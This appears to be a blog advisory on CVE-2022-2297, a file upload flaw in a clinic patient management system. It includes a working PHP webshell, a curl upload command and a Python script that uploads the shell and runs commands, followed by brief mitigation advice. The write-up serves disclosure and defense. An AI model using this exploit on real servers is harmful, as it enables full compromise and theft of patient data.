CVE-2022-2297 - Critical Unrestricted File Upload Vulnerability in SourceCodester Clinics Patient Management System 2.

TL;DR:  
A very serious security vulnerability, CVE-2022-2297, was found in the SourceCodester Clinics Patient Management System 2.. Through a flaw in the /pms/update_user.php file, attackers can upload malicious files, such as PHP webshells, and get full control of the server—with hardly any restrictions. This article breaks down the vulnerability, offers detailed walkthroughs, and shows how attackers might exploit this flaw, along with useful code snippets.

What’s the Problem?

The vulnerability resides in /pms/update_user.php, specifically where it handles the profile_picture parameter. Simply put, the application does not properly validate or restrict uploaded files for user profile images. A malicious user can upload executable scripts (like .php files), which are then placed in a web-accessible location. Visiting that file executes the script on the server, giving attackers the possibility to run any code they want.

In summary:  
You can upload PHP files as a profile picture, and they’ll work like real programs on the server. Bad news!

Official References

- NVD – CVE-2022-2297
- Exploit DB 50907
- Packet Storm Security Advisory

How Does the Exploit Work?

Vulnerable code location:  
- File: /pms/update_user.php

Attack vector: HTTP POST file upload

The code in update_user.php accepts a user-submitted file for their profile picture. It does not adequately check the file type or sanitize the filename. So, if an attacker uploads a file named shell.php containing PHP code, the server accepts it and puts it into a web-accessible directory—allowing the attacker (or anyone) to run the code through a browser.

Exploit Walkthrough

Let’s walk through a basic attack scenario using a simple PHP info test.

Create a file called shell.php with this content

<?php phpinfo(); ?>

This is harmless but shows that the server executes PHP. A real attacker might use a webshell, like

<?php system($_GET['cmd']); ?>

Warning: Never run this outside a safe test environment!

2. Make the Malicious Upload

You can use curl, Burp Suite, or write a Python script. Here’s a full example using curl.

curl -X POST http://victim-site/pms/update_user.php?user_id=1 \
  -F "profile_picture=@shell.php;type=application/x-php" \
  -b "PHPSESSID=YOUR_SESSION_COOKIE"

(You may need to be logged in, or the endpoint may allow non-authenticated uploads, depending on configuration. Test responsibly.)

If the upload works, your PHP file will be saved somewhere like /pms/uploads/. Navigate to

http://victim-site/pms/uploads/shell.php

If successful, you’ll see the PHP info page. For exploitation, an attacker could now issue direct commands:

http://victim-site/pms/uploads/shell.php?cmd=whoami

Here’s a full example of an exploit in Python using requests

import requests

url = "http://victim-site/pms/update_user.php?user_id=1"
files = {
    "profile_picture": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}
cookies = {
    "PHPSESSID": "YOUR_SESSION_COOKIE"
}
response = requests.post(url, files=files, cookies=cookies)
if response.status_code == 200:
    print("File uploaded successfully!")

shell_url = "http://victim-site/pms/uploads/shell.php?cmd=whoami"
res = requests.get(shell_url)
print(res.text)

Why Is This So Dangerous?

- Remote Code Execution: Run any command on the server—steal data, create admin users, compromise the whole network.

If you use this software, update immediately or patch manually

- Restrict file types (e.g., only allow JPEG/PNG)

Use random file names for uploads

Better yet, check if an official patch is available and apply it—don’t leave this one open!

Conclusion

CVE-2022-2297 is an example of an all-too-common web security mistake: unrestricted file upload. Attackers can take full control with very little effort. Mitigating this type of flaw is critical and should be a top priority for any PHP web application, especially ones handling sensitive client or patient data.

Discovered: 2022  
Affected versions: Clinic Patient Management System 2.  
Impact: Remote Code Execution, full compromise  
Exploit status: Publicly available

References:  
- NVD Entry
- Exploit-DB #50907
- Packet Storm Advisory

Timeline

Published on: 07/12/2022 17:15:00 UTC
Last modified on: 07/16/2022 02:39:00 UTC